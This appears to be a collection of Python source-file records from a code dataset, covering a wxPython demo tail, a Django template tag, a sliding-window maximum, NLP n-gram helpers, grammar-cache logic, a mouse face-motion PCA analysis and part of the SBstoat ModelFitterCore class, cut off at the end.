runTest(**kwargs):\n\twin = DataPanel(**kwargs)\n\treturn win\n\n#----------------------------------------------------------------------\n\n\n\noverview = \"\"\"\n
TreeListCtrl
\n\nThe TreeListCtrl is essentially a wx.TreeCtrl with extra columns,\nsuch that the look is similar to a wx.ListCtrl.\n\n\n\"\"\"\n\n\nif __name__ == '__main__':\n\t#raw_input(\"Press enter...\")\n\timport sys,os\n\tfrom misc import run\n\n\trun.main(['', os.path.basename(sys.argv[0])] + sys.argv[1:])","sub_path":"_misc/_editor/DataPanel.py","file_name":"DataPanel.py","file_ext":"py","file_size_in_byte":1436,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"}
+{"seq_id":"433390203","text":"from django import template\nfrom meta import cfr_section\n\nregister = template.Library()\n\n\ndef find_tag(root, tag):\n    for child in [c for c in root['children'] if isinstance(c, dict)]:\n        if child['tag'] == tag:\n            return child\n        # recurse with the tag (not the root) and propagate any match\n        result = find_tag(child, tag)\n        if result is not None:\n            return result\n\n\n@register.simple_tag\ndef entry_url(entry, meta):\n\n    version_and_eff_date = meta['node_id'].split(':')[0:2]\n\n    app_letter = find_tag(entry, 'appendixLetter')\n    if app_letter is None:\n        link = '/'.join(['regulation'] + version_and_eff_date + [entry['attributes']['target']])\n    elif app_letter['children'][0] == 'Interp':\n        link = '/'.join(['interpretations'] + version_and_eff_date + [entry['attributes']['target']])\n    else:\n        link = '/'.join(['regulation'] + version_and_eff_date + [entry['attributes']['target']])\n    return '/' + link","sub_path":"eregs_core/templatetags/toc.py","file_name":"toc.py","file_ext":"py","file_size_in_byte":880,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"}
+{"seq_id":"365760348","text":"def max_of_sub(arr, n, k):\n\t# cur_max avoids shadowing the built-in max()\n\tcur_max = 0\n\n\tfor i in range(n - k + 1):\n\t\tcur_max = arr[i]\n\n\t\tfor j in range(1, k):\n\t\t\tif arr[i + j] > cur_max:\n\t\t\t\tcur_max = arr[i + j]\n\n\t\tprint(cur_max, end = \" \")\n\narr = [int(item) for item in input(\"Enter the array items: \").split()]\nn = len(arr)\nk = int(input('Enter the size of sub-array: '))\nmax_of_sub(arr, n, k)\n","sub_path":"14. Sliding Window Max.py","file_name":"14. Sliding Window Max.py","file_ext":"py","file_size_in_byte":340,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"}
+{"seq_id":"495278340","text":"import os\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport pandas as pd\nimport nltk\nfrom nltk.util import ngrams\n\n\ndef remove_unicode(file_in, file_out):\n\t'''\n\tRemoves lines containing unicode characters from a file.\n\tThe file is left intact. \n\t'''\n\tfile_in = open(file_in, 'r')\n\tfile_out = open(file_out, 'w')\n\n\tfor line in file_in:\n\t\ttry:\n\t\t\tfile_out.write(line.encode('ASCII'))\n\t\texcept UnicodeDecodeError:\n\t\t\tpass\n\n\tfile_in.close()\n\tfile_out.close()\n\n\ndef clean_token(t):\n\t'''\n\tInput parameter is a token (list). The token is cleaned from punctuation \n\tand bad words (profanity filter). \n\t'''\n\tpunctuation_list = ['.', ',', '...', \"''\", '~', ';', '+', '_', '/', '//', \"\\\\\", \n\t\t\"-/\", '[', ']', '{', '}', '..', '.-', '``', '(', ')', ':', '?', '!', '-', \n\t\t'--', '&', '%', '*', '$', '#', '@', '>', '<', '=', '-__-', '-_-', '^_^', '-.-', '|']\n\tclean_list = [x for x in t if x not in punctuation_list]\n\treturn clean_list\n\n\ndef tokenize_file(file_in, file_out):\n\t'''\n\tOpens a file and reads it line by line and tokenizes it. 
\n\tThe exception handles non-ascii characters.\n\tIn the output file each word/letter/character is well-separated by\n\ta whitespace.\n\t'''\n\tfile_in = open(file_in, 'r')\n\tfile_out = open(file_out, 'w')\n\n\tfor line in file_in:\n\t\ttemp_token = nltk.word_tokenize(line)\n\t\tfor item in temp_token:\n\t\t\tfile_out.write(\"%s \" % item)\n\t\tfile_out.write(\"\\n\")\n\t\n\tfile_out.close()\n\tfile_in.close()\n\n\ndef get_ngram(file_in, file_out, n):\n\t'''\n\tGiven a cleaned, tokenized file, this function creates a new file containing\n\tthe n grams and their frequencies. The result is produced in a data.frame to \n\timport it in R.\n\t'''\n\tfile_in = open(file_in, 'r')\n\tfile_out = open(file_out, 'w')\n\tngram_dict = {}\n\n\tif n == 1:\n\t\tfor line in file_in:\n\t\t for item in nltk.word_tokenize(line):\n\t\t\t ngram_dict[item] = ngram_dict.get(item, 0) + 1\n\telse:\n\t\tfor line in file_in:\n\t\t for item in list(ngrams(nltk.word_tokenize(line) , n)):\n\t\t\t bigram_dict[item] = ngram_dict.get(item, 0) + 1\n\n\ttemp_df = pd.Series(single_gram_dict)\n\ttemp_df.to_csv(file_out)\n\tfile_out.close()\n\tfile_in.close()\n","sub_path":"capstone.py","file_name":"capstone.py","file_ext":"py","file_size_in_byte":2093,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"449084478","text":"# coding: utf-8\n\nfrom utg import relations as r\n\n\ndef get_property_relations():\n return [relation\n for relation in r.__dict__.itervalues()\n if relation != r.WORD_PROPERTY and isinstance(relation, type) and issubclass(relation, r.WORD_PROPERTY)]\n\n\ndef get_default_properties():\n values = {}\n\n for relation in get_property_relations():\n values[relation] = relation.records[0]\n\n values[r.WORD_TYPE] = None\n\n return values\n\ndef get_verbose_to_relations():\n values = {}\n\n for relation in get_property_relations():\n for record in relation.records:\n values[record.verbose_id] = record\n\n return values\n\n\ndef _keys_generator(left, right, restrictions):\n from utg.data import PRESETS\n\n if not right:\n yield []\n return\n\n central, right = right[0], right[1:]\n\n # if property is in preset\n for preset_owner, preset_slave in PRESETS.iteritems():\n if preset_slave._relation == central and preset_owner in left:\n for tail in _keys_generator(left + [preset_slave], right, restrictions):\n yield [preset_slave] + tail\n return\n\n # if property in restrictions\n for used_property in left:\n if used_property in restrictions and central in restrictions[used_property]:\n for tail in _keys_generator(left + [None], right, restrictions):\n yield [None] + tail\n return\n\n for record in central.records:\n for tail in _keys_generator(left + [record], right, restrictions):\n yield [record] + tail\n\n return\n\n\ndef _get_cache(schema, restrictions):\n cache = {}\n inverted_cache = []\n\n for i, key in enumerate(_keys_generator([], schema, restrictions=restrictions)):\n cache[tuple(key)] = i\n inverted_cache.append(tuple(key))\n\n return cache, inverted_cache\n\n\ndef _populate_key_with_presets(key, schema):\n from utg.data import PRESETS\n\n replaces = {}\n\n for property in key:\n if property not in PRESETS:\n continue\n\n replace = PRESETS[property]\n replaces[replace._relation] = replace\n\n if not replaces:\n return\n\n for index, property_group in enumerate(schema):\n if property_group in replaces:\n key[index] = replaces[property_group]\n\n\ndef get_caches(restrictions):\n\n caches = {}\n inverted_caches = {}\n\n for word_type in 
r.WORD_TYPE.records:\n cache, inverted_cache = _get_cache(word_type.schema, restrictions[word_type])\n\n caches[word_type] = cache\n inverted_caches[word_type] = inverted_cache\n\n\n return caches, inverted_caches\n\n\ndef get_nearest_key(key, available_keys):\n best_key = None\n best_similarity = -1\n\n for available_key in available_keys:\n current_similarity = 0\n for index, (key_property, available_key_property) in enumerate(zip(key, available_key)):\n if key_property == available_key_property:\n current_similarity += (1 + 0.01 * index) # first elements in schema has less priority\n\n if current_similarity > best_similarity:\n best_similarity = current_similarity\n best_key = available_key\n\n return best_key\n\n\ndef _raw_keys_generator(left, key, schema):\n from utg.data import PRESETS\n\n if not key:\n yield []\n return\n\n schema_head, schema_tail = schema[0], schema[1:]\n key_head, key_tail = key[0], key[1:]\n\n # if head is in preset\n for preset_owner, preset_slave in PRESETS.iteritems():\n if preset_slave == key_head and preset_owner in left:\n key_head = None\n break\n\n\n if key_head is not None:\n for tail in _raw_keys_generator(left + [key_head], key_tail, schema_tail):\n yield [key_head] + tail\n return\n\n for head in schema_head.records:\n for tail in _raw_keys_generator(left + [head], key_tail, schema_tail):\n yield [head] + tail\n\n return\n\n\ndef _get_raw_cache(keys, schema):\n cache = {}\n\n for index, key in enumerate(keys):\n for raw_key in _raw_keys_generator([], key, schema):\n cache[tuple(raw_key)] = index\n\n return cache\n\n\ndef get_raw_caches(inverted_caches):\n caches = {}\n\n for word_type in r.WORD_TYPE.records:\n cache = _get_raw_cache(inverted_caches[word_type], word_type.schema)\n\n caches[word_type] = cache\n\n return caches\n\n\ndef pretty_format_current_keys_cache():\n import pprint\n\n from utg import data\n\n return pprint.pformat(data.WORDS_CACHES)\n","sub_path":"utg/logic.py","file_name":"logic.py","file_ext":"py","file_size_in_byte":4523,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"503490781","text":"import os\nimport cv2\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom tqdm import tqdm\nfrom sklearn.decomposition import TruncatedSVD\n\ndef get_face_data(video_file, face_pixels):\n\n # Open Video File\n cap = cv2.VideoCapture(video_file)\n frameCount = int(cap.get(cv2.CAP_PROP_FRAME_COUNT))\n frameWidth = int(cap.get(cv2.CAP_PROP_FRAME_WIDTH))\n frameHeight = int(cap.get(cv2.CAP_PROP_FRAME_HEIGHT))\n\n # Extract Selected Frames\n face_data = []\n for frame_index in range(frameCount):\n ret, frame = cap.read()\n frame = frame[:, :, 0]\n\n face_frame = []\n for pixel in face_pixels:\n face_frame.append(frame[pixel[0], pixel[1]])\n\n face_data.append(face_frame)\n frame_index += 1\n\n cap.release()\n face_data = np.array(face_data)\n return face_data, frameHeight, frameWidth\n\n\ndef get_bodycam_filename(base_directory):\n file_list = os.listdir(base_directory)\n for file_name in file_list:\n if \"_cam_1.mp4\" in file_name:\n return file_name\n\n\ndef view_whisker_activity(whisker_data, whisker_pixels, frame_height, frame_width):\n\n number_of_frames = len(whisker_data)\n number_of_whisker_pixels = np.shape(whisker_pixels)[0]\n\n whisker_y_min = np.min(whisker_pixels[:, 0])\n whisker_y_max = np.max(whisker_pixels[:, 0])\n whisker_x_min = np.min(whisker_pixels[:, 1])\n whisker_x_max = np.max(whisker_pixels[:, 1])\n\n plt.ion()\n for frame_index in range(number_of_frames):\n 
template = np.zeros((frame_height, frame_width))\n for pixel_index in range(number_of_whisker_pixels):\n pixel_value = whisker_data[frame_index, pixel_index]\n template[whisker_pixels[pixel_index, 0], whisker_pixels[pixel_index, 1]] = pixel_value\n\n plt.imshow(template[whisker_y_min:whisker_y_max, whisker_x_min:whisker_x_max], vmin=0, vmax=50)\n plt.draw()\n plt.pause(0.1)\n plt.clf()\n\ndef match_whisker_motion_to_widefield_motion(base_directory, transformed_whisker_data):\n\n print(\"Matching\")\n\n # Load Widefield To Mousecam Frame Dict\n widefield_to_mousecam_frame_dict = np.load(os.path.join(base_directory, \"Stimuli_Onsets\", \"widfield_to_mousecam_frame_dict.npy\"), allow_pickle=True)[()]\n widefield_frame_list = list(widefield_to_mousecam_frame_dict.keys())\n number_of_mousecam_frames = np.shape(transformed_whisker_data)[0]\n\n print(\"Widefield Frames\", len(widefield_frame_list))\n print(\"Mousecam Frames\", number_of_mousecam_frames)\n print(\"Minimum Matched Mousecam Frame\", np.min(list(widefield_to_mousecam_frame_dict.values())))\n print(\"Maximum Matched Mousecam Frame\", np.max(list(widefield_to_mousecam_frame_dict.values())))\n print(\"Transformed Whisker Data Shape\", np.shape(transformed_whisker_data))\n\n # Match Whisker Activity To Widefield Frames\n matched_whisker_data = []\n for widefield_frame in widefield_frame_list:\n corresponding_mousecam_frame = widefield_to_mousecam_frame_dict[widefield_frame]\n if corresponding_mousecam_frame < number_of_mousecam_frames:\n matched_whisker_data.append(transformed_whisker_data[corresponding_mousecam_frame])\n else:\n print(\"unmatched, mousecam frame: \", corresponding_mousecam_frame)\n matched_whisker_data = np.array(matched_whisker_data)\n return matched_whisker_data\n\n\ndef plot_cumulative_explained_variance(explained_variance, save_directory):\n cumulative_variance = np.cumsum(explained_variance)\n x_values = list(range(1, len(cumulative_variance)+1))\n plt.title(\"Cumulative Explained Variance, Face Movement PCA\")\n plt.plot(x_values, cumulative_variance)\n plt.ylim([0, 1.1])\n plt.savefig(os.path.join(save_directory, \"Face_Cumulative_Explained_Variance.png\"))\n plt.close()\n\n\ndef decompose_face_motion(base_directory):\n\n # Load Whisker Pixels\n face_pixels = np.load(os.path.join(base_directory, \"Mousecam_Analysis\", \"Face_Pixels.npy\"))\n face_pixels = np.transpose(face_pixels)\n\n # Get Bodycam Filename\n bodycam_filename = get_bodycam_filename(base_directory)\n bodycam_file = os.path.join(base_directory, bodycam_filename)\n\n # Get Whisker Data\n face_data, frame_height, frame_width = get_face_data(bodycam_file, face_pixels)\n face_data = np.ndarray.astype(face_data, float)\n\n # Get Whisker Motion Energy\n face_motion_energy = np.diff(face_data, axis=0)\n face_motion_energy = np.abs(face_motion_energy)\n\n # Peform SVD on this\n model = TruncatedSVD(n_components=500)\n model.fit(face_motion_energy)\n\n # Get Explained Variance\n explained_variance = model.explained_variance_ratio_\n\n # Save This\n np.save(os.path.join(base_directory, \"Mousecam_Analysis\", \"Explained_Variance_200.npy\"), explained_variance)\n return explained_variance\n\n\n\ndef calculate_dimensionality(session_list):\n\n # Create Figure\n figure_1 = plt.figure()\n individual_axis = figure_1.add_subplot(1,2,1)\n cumulative_axis = figure_1.add_subplot(1,2,2)\n\n for base_directory in tqdm(session_list):\n explained_variance = decompose_face_motion(os.path.join(\"/media/matthew/Expansion/Control_Data\", base_directory))\n\n 
individual_axis.plot(explained_variance)\n        cumulative_axis.plot(np.cumsum(explained_variance))\n\n    plt.show()\n\n\ndef estimate_average_dimensionality(session_list):\n\n    dimensionality_list = []\n    for base_directory in tqdm(session_list):\n        explained_variance = np.load(os.path.join("/media/matthew/Expansion/Control_Data",base_directory, "Mousecam_Analysis", "Explained_Variance_200.npy"))\n        dimensionality_list.append(explained_variance)\n\n    dimensionality_list = np.array(dimensionality_list)\n    dimensionality_list = np.cumsum(dimensionality_list, axis=1)\n    mean_dimensionality = np.mean(dimensionality_list, axis=0)\n    # spread across sessions at each component count, not the SD of the mean curve\n    dimensionality_sd = np.std(dimensionality_list, axis=0)\n\n    eighty_counter = 1\n    for x in range(500):\n        if mean_dimensionality[x] > 0.8:\n            print("80% Of Variance Explained By: ", eighty_counter, "Components")\n            break\n        eighty_counter += 1\n\n    ninety_counter = 1\n    for x in range(500):\n        if mean_dimensionality[x] > 0.9:\n            print("90% Of Variance Explained By: ", ninety_counter, "Components")\n            break\n        ninety_counter += 1\n\n    print("next 100 components", mean_dimensionality[eighty_counter-1 + 100])\n\n    x_values = list(range(len(mean_dimensionality)))\n    x_values = np.add(x_values, 1)\n    plt.plot(x_values, mean_dimensionality)\n\n    sd_upper_bound = np.add(mean_dimensionality, dimensionality_sd)\n    sd_lower_bound = np.subtract(mean_dimensionality, dimensionality_sd)\n    plt.fill_between(x_values, sd_lower_bound, sd_upper_bound, alpha=0.1)\n\n    plt.show()\n\n\n# Select Sessions\nselected_session_list = [\n\n    r"NRXN78.1A/2020_12_05_Switching_Imaging",\n    r"NRXN78.1A/2020_12_09_Switching_Imaging",\n\n    r"NRXN78.1D/2020_11_29_Switching_Imaging",\n    r"NRXN78.1D/2020_12_05_Switching_Imaging",\n\n    r"NXAK14.1A/2021_05_21_Switching_Imaging",\n    r"NXAK14.1A/2021_05_23_Switching_Imaging",\n    r"NXAK14.1A/2021_06_11_Switching_Imaging",\n    r"NXAK14.1A/2021_06_13_Transition_Imaging",\n    r"NXAK14.1A/2021_06_15_Transition_Imaging",\n    r"NXAK14.1A/2021_06_17_Transition_Imaging",\n\n    r"NXAK22.1A/2021_10_14_Switching_Imaging",\n    r"NXAK22.1A/2021_10_20_Switching_Imaging",\n    r"NXAK22.1A/2021_10_22_Switching_Imaging",\n    r"NXAK22.1A/2021_10_29_Transition_Imaging",\n    r"NXAK22.1A/2021_11_03_Transition_Imaging",\n    r"NXAK22.1A/2021_11_05_Transition_Imaging",\n\n    r"NXAK4.1B/2021_03_02_Switching_Imaging",\n    r"NXAK4.1B/2021_03_04_Switching_Imaging",\n    r"NXAK4.1B/2021_03_06_Switching_Imaging",\n    r"NXAK4.1B/2021_04_02_Transition_Imaging",\n    r"NXAK4.1B/2021_04_08_Transition_Imaging",\n    r"NXAK4.1B/2021_04_10_Transition_Imaging",\n\n    r"NXAK7.1B/2021_02_26_Switching_Imaging",\n    r"NXAK7.1B/2021_02_28_Switching_Imaging",\n    r"NXAK7.1B/2021_03_02_Switching_Imaging",\n    r"NXAK7.1B/2021_03_23_Transition_Imaging",\n    r"NXAK7.1B/2021_03_31_Transition_Imaging",\n    r"NXAK7.1B/2021_04_02_Transition_Imaging",\n\n]\n\n#calculate_dimensionality(selected_session_list)\nestimate_average_dimensionality(selected_session_list)\n","sub_path":"Ridge_Regression_Model/Estimate_Face_Movement_Dimensionality.py","file_name":"Estimate_Face_Movement_Dimensionality.py","file_ext":"py","file_size_in_byte":8228,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"}
{"seq_id":"97007213","text":"# -*- coding: utf-8 -*-\r\n"""\r\n    Created on August 18, 2020\r\n\r\n@author: joseph-hellerstein\r\n\r\nCore logic of model fitter. 
Does not include plots.\r\n\"\"\"\r\n\r\nfrom SBstoat.namedTimeseries import NamedTimeseries, TIME, mkNamedTimeseries\r\nfrom SBstoat.logs import Logger\r\nimport SBstoat.timeseriesPlotter as tp\r\nfrom SBstoat import rpickle\r\n\r\nimport collections\r\nimport copy\r\nimport lmfit\r\nimport numpy as np\r\nimport tellurium as te\r\nimport typing\r\n\r\n# Constants\r\nPARAMETER_LOWER_BOUND = 0\r\nPARAMETER_UPPER_BOUND = 10\r\n# Minimizer methods\r\nMETHOD_DIFFERENTIAL_EVOLUTION = \"differential_evolution\"\r\nMETHOD_BOTH = \"both\"\r\nMETHOD_LEASTSQ = \"leastsq\"\r\nMETHOD_FITTER_DEFAULTS = [METHOD_DIFFERENTIAL_EVOLUTION, METHOD_LEASTSQ]\r\nMETHOD_BOOTSTRAP_DEFAULTS = [METHOD_LEASTSQ,\r\n METHOD_DIFFERENTIAL_EVOLUTION, METHOD_LEASTSQ]\r\nMAX_CHISQ_MULT = 5\r\nPERCENTILES = [2.5, 97.55] # Percentile for confidence limits\r\nINDENTATION = \" \"\r\nNULL_STR = \"\"\r\nIS_REPORT = False\r\nLOWER_PARAMETER_MULT = 0.95\r\nUPPER_PARAMETER_MULT = 0.95\r\nLARGE_RESIDUAL = 1000000\r\n\r\n\r\n_BestParameters = collections.namedtuple(\"_BestParameters\",\r\n \"params rssq\") # parameters, residuals sum of squares\r\n\r\n\r\n\r\n##############################\r\nclass ParameterSpecification():\r\n\r\n def __init__(self, lower=None, value=None, upper=None):\r\n self.lower = lower\r\n self.value = value\r\n self.upper = upper\r\n\r\n\r\nclass ModelFitterCore(rpickle.RPickler):\r\n\r\n # Subclasses used in interface\r\n class OptimizerMethod():\r\n\r\n def __init__(self, method, kwargs):\r\n self.method = method\r\n self.kwargs = kwargs\r\n\r\n\r\n def __init__(self, modelSpecification, observedData,\r\n parametersToFit=None,\r\n selectedColumns=None,\r\n fitterMethods=None,\r\n numFitRepeat=1,\r\n bootstrapMethods=None,\r\n parameterLowerBound=PARAMETER_LOWER_BOUND,\r\n parameterUpperBound=PARAMETER_UPPER_BOUND,\r\n parameterDct=None,\r\n fittedDataTransformDct=None,\r\n logger=Logger(),\r\n isPlot=True,\r\n _loggerPrefix=\"\",\r\n # The following must be kept in sync with ModelFitterBootstrap.bootstrap\r\n numIteration:int=10,\r\n reportInterval:int=1000,\r\n maxProcess:int=None,\r\n serializePath:str=None,\r\n ):\r\n \"\"\"\r\n Constructs estimates of parameter values.\r\n\r\n Parameters\r\n ----------\r\n modelSpecification: ExtendedRoadRunner/str\r\n roadrunner model or antimony model\r\n observedData: NamedTimeseries/str\r\n str: path to CSV file\r\n parametersToFit: list-str/None\r\n parameters in the model that you want to fit\r\n if None, no parameters are fit\r\n selectedColumns: list-str\r\n species names you wish use to fit the model\r\n default: all columns in observedData\r\n parameterLowerBound: float\r\n lower bound for the fitting parameters\r\n parameterUpperBound: float\r\n upper bound for the fitting parameters\r\n parameterDct: dict\r\n key: parameter name\r\n value: triple - (lowerVange, startingValue, upperRange)\r\n fittedDataTransformDct: dict\r\n key: column in selectedColumns\r\n value: function of the data in selectedColumns;\r\n input: NamedTimeseries\r\n output: array for the values of the column\r\n logger: Logger\r\n fitterMethods: str/list-str/list-OptimizerMethod\r\n method used for minimization in fitModel\r\n numFitRepeat: int\r\n number of times fitting is repeated for a method\r\n bootstrapMethods: str/list-str/list-OptimizerMethod\r\n method used for minimization in bootstrap\r\n numIteration: number of bootstrap iterations\r\n reportInterval: number of iterations between progress reports\r\n maxProcess: Maximum number of processes to use. 
Default: numCPU\r\n serializePath: Where to serialize the fitter after bootstrap\r\n\r\n Usage\r\n -----\r\n parameterDct = {\r\n \"k1\": (1, 5, 10), # name of parameter: low value, initial, high\r\n \"k2\": (2, 3, 6)}\r\n ftter = ModelFitter(roadrunnerModel, \"observed.csv\",\r\n parameterDct=parameterDct)\r\n fitter.fitModel() # Do the fit\r\n fitter.bootstrap() # Estimate parameter variance with bootstrap\r\n \"\"\"\r\n if modelSpecification is not None:\r\n # Not the default constructor\r\n self._loggerPrefix = _loggerPrefix\r\n self.modelSpecification = modelSpecification\r\n self.parametersToFit = parametersToFit\r\n self.lowerBound = parameterLowerBound\r\n self.upperBound = parameterUpperBound\r\n self.bootstrapKwargs = dict(\r\n numIteration=numIteration,\r\n reportInterval=reportInterval,\r\n maxProcess=maxProcess,\r\n serializePath=serializePath,\r\n )\r\n self.parameterDct = ModelFitterCore._updateParameterDct(parameterDct)\r\n self._numFitRepeat = numFitRepeat\r\n if self.parametersToFit is None:\r\n self.parametersToFit = list(self.parameterDct.keys())\r\n self.observedTS = observedData\r\n if self.observedTS is not None:\r\n self.observedTS = mkNamedTimeseries(observedData)\r\n #\r\n self.fittedDataTransformDct = fittedDataTransformDct\r\n #\r\n if (selectedColumns is None) and (self.observedTS is not None):\r\n selectedColumns = self.observedTS.colnames\r\n self.selectedColumns = selectedColumns\r\n if self.observedTS is not None:\r\n self._observedArr = self.observedTS[self.selectedColumns].flatten()\r\n else:\r\n self._observedArr = None\r\n # Other internal state\r\n self._fitterMethods = self._makeMethods(fitterMethods,\r\n METHOD_FITTER_DEFAULTS)\r\n self._bootstrapMethods = self._makeMethods(bootstrapMethods,\r\n METHOD_BOOTSTRAP_DEFAULTS)\r\n if isinstance(self._bootstrapMethods, str):\r\n self._bootstrapMethods = [self._bootstrapMethods]\r\n self._isPlot = isPlot\r\n self._plotter = tp.TimeseriesPlotter(isPlot=self._isPlot)\r\n self._plotFittedTS = None # Timeseries that is plotted\r\n self.logger = logger\r\n # The following are calculated during fitting\r\n self.roadrunnerModel = None\r\n self.minimizer = None # lmfit.minimizer\r\n self.minimizerResult = None # Results of minimization\r\n self.params = None # params property in lmfit.minimizer\r\n self.fittedTS = self.observedTS.copy(isInitialize=True) # Initialize\r\n self.residualsTS = None # Residuals for selectedColumns\r\n self.bootstrapResult = None # Result from bootstrapping\r\n # Validation checks\r\n self._validateFittedDataTransformDct()\r\n self._bestParameters = _BestParameters(rssq=None, params=None)\r\n else:\r\n pass\r\n\r\n def _makeMethods(self, methods, default):\r\n \"\"\"\r\n Creates a method dictionary.\r\n\r\n Parameters\r\n ----------\r\n methods: str/list-str/dict\r\n method used for minimization in fitModel\r\n dict: key-method, value-optional parameters\r\n\r\n Returns\r\n -------\r\n list-OptimizerMethod\r\n key: method name\r\n value: dict of optional parameters\r\n \"\"\"\r\n if methods is None:\r\n methods = default\r\n if isinstance(methods, str):\r\n if methods == METHOD_BOTH:\r\n methods = METHOD_FITTER_DEFAULTS\r\n else:\r\n methods = [methods]\r\n if isinstance(methods, list):\r\n if isinstance(methods[0], str):\r\n results = [ModelFitterCore.OptimizerMethod(method=m, kwargs={})\r\n for m in methods]\r\n else:\r\n results = methods\r\n else:\r\n raise RuntimeError(\"Must be a list\")\r\n trues = [isinstance(m, ModelFitterCore.OptimizerMethod) for m in results]\r\n if not 
all(trues):\r\n            raise ValueError("Invalid methods: %s" % str(methods))\r\n        return results\r\n\r\n\r\n    @classmethod\r\n    def mkParameters(cls, parameterDct:dict=None,\r\n              parametersToFit:list=None,\r\n              logger:Logger=Logger(),\r\n              lowerBound:float=PARAMETER_LOWER_BOUND,\r\n              upperBound:float=PARAMETER_UPPER_BOUND)->lmfit.Parameters:\r\n        """\r\n        Constructs lmfit parameters based on specifications.\r\n\r\n        Parameters\r\n        ----------\r\n        parameterDct: key=name, value=ParameterSpecification\r\n        parametersToFit: list of parameters to fit\r\n        logger: error logger\r\n        lowerBound: lower value of range for parameters\r\n        upperBound: upper value of range for parameters\r\n\r\n        Returns\r\n        -------\r\n        lmfit.Parameters\r\n        """\r\n        def get(value, base_value, multiplier):\r\n            if value is not None:\r\n                return value\r\n            return base_value*multiplier\r\n        #\r\n        if (parametersToFit is None) and (parameterDct is None):\r\n            raise RuntimeError("Must specify one of these parameters.")\r\n        if parameterDct is None:\r\n            parameterDct = {}\r\n        if parametersToFit is None:\r\n            parametersToFit = parameterDct.keys()\r\n        if logger is None:\r\n            logger = Logger()\r\n        params = lmfit.Parameters()\r\n        for parameterName in parametersToFit:\r\n            if parameterName in parameterDct.keys():\r\n                specification = parameterDct[parameterName]\r\n                value = get(specification.value, specification.value, 1.0)\r\n                if value > 0:\r\n                    lower_factor = LOWER_PARAMETER_MULT\r\n                    upper_factor = UPPER_PARAMETER_MULT\r\n                else:\r\n                    upper_factor = UPPER_PARAMETER_MULT\r\n                    lower_factor = LOWER_PARAMETER_MULT\r\n                lower = get(specification.lower, specification.value,\r\n                      lower_factor)\r\n                upper = get(specification.upper, specification.value,\r\n                      upper_factor)\r\n                if np.isclose(lower - upper, 0):\r\n                    upper = 0.0001\r\n                try:\r\n                    params.add(parameterName, value=value, min=lower, max=upper)\r\n                except Exception as err:\r\n                    msg = "modelFitterCore/mkParameters parameterName %s" \\\r\n                          % parameterName\r\n                    logger.error(msg, err)\r\n            else:\r\n                value = np.mean([lowerBound, upperBound])\r\n                params.add(parameterName, value=value,\r\n                      min=lowerBound, max=upperBound)\r\n        return params\r\n\r\n    @classmethod\r\n    def initializeRoadrunnerModel(cls, modelSpecification):\r\n        """\r\n        Sets self.roadrunnerModel.\r\n\r\n        Parameters\r\n        ----------\r\n        modelSpecification: ExtendedRoadRunner/str\r\n\r\n        Returns\r\n        -------\r\n        ExtendedRoadRunner\r\n        """\r\n        if isinstance(modelSpecification,\r\n              te.roadrunner.extended_roadrunner.ExtendedRoadRunner):\r\n            roadrunnerModel = modelSpecification\r\n        elif isinstance(modelSpecification, str):\r\n            roadrunnerModel = te.loada(modelSpecification)\r\n        else:\r\n            msg = 'Invalid model.'\r\n            msg = msg + "\\nA model must either be a Roadrunner model "\r\n            msg = msg + "or an Antimony model."\r\n            raise ValueError(msg)\r\n        return roadrunnerModel\r\n\r\n    @classmethod\r\n    def setupModel(cls, roadrunner, parameters, logger=Logger()):\r\n        """\r\n        Sets up the model for use based on the parameter values\r\n\r\n        Parameters\r\n        ----------\r\n        roadrunner: ExtendedRoadRunner\r\n        parameters: lmfit.Parameters\r\n        logger: Logger\r\n        """\r\n        pp = parameters.valuesdict()\r\n        for parameter in pp.keys():\r\n            try:\r\n                roadrunner.model[parameter] = pp[parameter]\r\n            except Exception as err:\r\n                msg = "_modelFitterCore.setupModel: Could not set value for %s" \\\r\n                      % parameter\r\n                logger.error(msg, err)\r\n\r\n    @classmethod\r\n    def runSimulation(cls, parameters=None,\r\n              roadrunner=None,\r\n              startTime=0,\r\n              endTime=5,\r\n              numPoint=30,\r\n              selectedColumns=None,\r\n              returnDataFrame=True,\r\n              _logger=Logger(),\r\n              _loggerPrefix="",\r\n              ):\r\n        """\r\n        Runs a simulation. Defaults to parameter values in the simulation.\r\n\r\n        Parameters\r\n        ----------\r\n        roadrunner: ExtendedRoadRunner/str\r\n            Roadrunner model\r\n        parameters: lmfit.Parameters\r\n            lmfit parameters\r\n        startTime: float\r\n            start time for the simulation\r\n        endTime: float\r\n            end time for the simulation\r\n        numPoint: int\r\n            number of points in the simulation\r\n        selectedColumns: list-str\r\n            output columns in simulation\r\n        returnDataFrame: bool\r\n            return a DataFrame\r\n        _logger: Logger\r\n        _loggerPrefix: str\r\n\r\n\r\n        Return\r\n        ------\r\n        NamedTimeseries (or None if the simulation fails to converge)\r\n        """\r\n        if isinstance(roadrunner, str):\r\n            roadrunner = cls.initializeRoadrunnerModel(roadrunner)\r\n        else:\r\n            roadrunner.reset()\r\n        if parameters is not None:\r\n            # Parameters have been specified\r\n            cls.setupModel(roadrunner, parameters, logger=_logger)\r\n        # Do the simulation\r\n        if selectedColumns is not None:\r\n            newSelectedColumns = list(selectedColumns)\r\n            if TIME not in newSelectedColumns:\r\n                newSelectedColumns.insert(0, TIME)\r\n            try:\r\n                data = roadrunner.simulate(startTime, endTime, numPoint,\r\n                      newSelectedColumns)\r\n            except Exception as err:\r\n                _logger.error("Roadrunner exception: ", err)\r\n                data = None\r\n        else:\r\n            try:\r\n                data = roadrunner.simulate(startTime, endTime, numPoint)\r\n            except Exception as err:\r\n                _logger.exception("Roadrunner exception: %s", err)\r\n                data = None\r\n        if data is None:\r\n            return data\r\n        fittedTS = NamedTimeseries(namedArray=data)\r\n        if returnDataFrame:\r\n            result = fittedTS.to_dataframe()\r\n        else:\r\n            result = fittedTS\r\n        return result\r\n\r\n    @classmethod\r\n    def rpConstruct(cls):\r\n        """\r\n        Overrides rpickler.rpConstruct to create a method that\r\n        constructs an instance without arguments.\r\n\r\n        Returns\r\n        -------\r\n        Instance of cls\r\n  